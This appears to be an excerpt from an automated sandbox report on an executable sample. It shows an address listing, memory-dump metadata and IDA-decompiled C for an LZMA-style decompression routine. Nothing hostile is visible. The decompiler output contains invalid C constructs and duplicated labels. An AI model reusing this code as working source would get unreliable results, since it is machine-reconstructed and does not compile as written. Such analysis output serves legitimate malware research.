                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407002

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                          • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                          • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                          • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E0040711C() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xb;
                                                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x28);
                                                          						L88:
                                                          						 *(__ebp - 0x2c) = __eax;
                                                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          						L89:
                                                          						__eax =  *(__ebp - 4);
                                                          						 *(__ebp - 0x80) = 0x15;
                                                          						__eax =  *(__ebp - 4) + 0xa68;
                                                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          						L69:
                                                          						 *(__ebp - 0x84) = 0x12;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t613 - 0x54) = _t606;
                                                          							while(1) {
                                                          								L133:
                                                          								_t531 =  *_t606;
                                                          								_t589 = _t531 & 0x0000ffff;
                                                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          								if( *(_t613 - 0xc) >= _t565) {
                                                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          									 *(_t613 - 0x40) = 1;
                                                          									_t532 = _t531 - (_t531 >> 5);
                                                          									 *_t606 = _t532;
                                                          								} else {
                                                          									 *(_t613 - 0x10) = _t565;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          								}
                                                          								if( *(_t613 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t613 - 0x6c) == 0) {
                                                          									 *(_t613 - 0x88) = 5;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t533 =  *(_t613 - 0x84);
                                                          								while(1) {
                                                          									 *(_t613 - 0x88) = _t533;
                                                          									while(1) {
                                                          										L1:
                                                          										_t534 =  *(_t613 - 0x88);
                                                          										if(_t534 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          											case 0:
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t534 =  *( *(_t613 - 0x70));
                                                          												if(_t534 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t538 = _t534 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t570);
                                                          												_push(9);
                                                          												_pop(_t571);
                                                          												_t609 = _t538 / _t570;
                                                          												_t540 = _t538 % _t570 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t604 = _t540 % _t571 & 0x000000ff;
                                                          												 *(_t613 - 0x3c) = _t604;
                                                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          													L10:
                                                          													if(_t612 == 0) {
                                                          														L12:
                                                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t612 = _t612 - 1;
                                                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          													} while (_t612 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t613 - 4) != 0) {
                                                          													GlobalFree( *(_t613 - 4));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t613 - 4) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t45 = _t613 - 0x48;
                                                          												 *_t45 =  *(_t613 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t613 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t546 =  *(_t613 - 0x40);
                                                          												if(_t546 ==  *(_t613 - 0x74)) {
                                                          													L20:
                                                          													 *(_t613 - 0x48) = 5;
                                                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t613 - 0x74) = _t546;
                                                          												if( *(_t613 - 8) != 0) {
                                                          													GlobalFree( *(_t613 - 8));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          												 *(_t613 - 8) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          												 *(_t613 - 0x84) = 6;
                                                          												 *(_t613 - 0x4c) = _t553;
                                                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          												L132:
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												_t67 = _t613 - 0x70;
                                                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          												if( *(_t613 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t531 =  *_t606;
                                                          												_t589 = _t531 & 0x0000ffff;
                                                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          												if( *(_t613 - 0xc) >= _t565) {
                                                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          													 *(_t613 - 0x40) = 1;
                                                          													_t532 = _t531 - (_t531 >> 5);
                                                          													 *_t606 = _t532;
                                                          												} else {
                                                          													 *(_t613 - 0x10) = _t565;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          												}
                                                          												if( *(_t613 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												__eflags =  *(__ebp - 0x40) - 1;
                                                          												if( *(__ebp - 0x40) != 1) {
                                                          													__eax =  *(__ebp - 0x24);
                                                          													 *(__ebp - 0x80) = 0x16;
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x28);
                                                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          													__eax = 0;
                                                          													__eflags =  *(__ebp - 0x38) - 7;
                                                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          													__al = __al & 0x000000fd;
                                                          													__eax = (__eflags >= 0) - 1 + 0xa;
                                                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x664;
                                                          													__eflags = __eax;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													goto L69;
                                                          												}
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 8;
                                                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t259;
                                                          												0 | _t259 = _t259 + _t259 + 9;
                                                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          												goto L76;
                                                          											case 0xa:
                                                          												goto L0;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
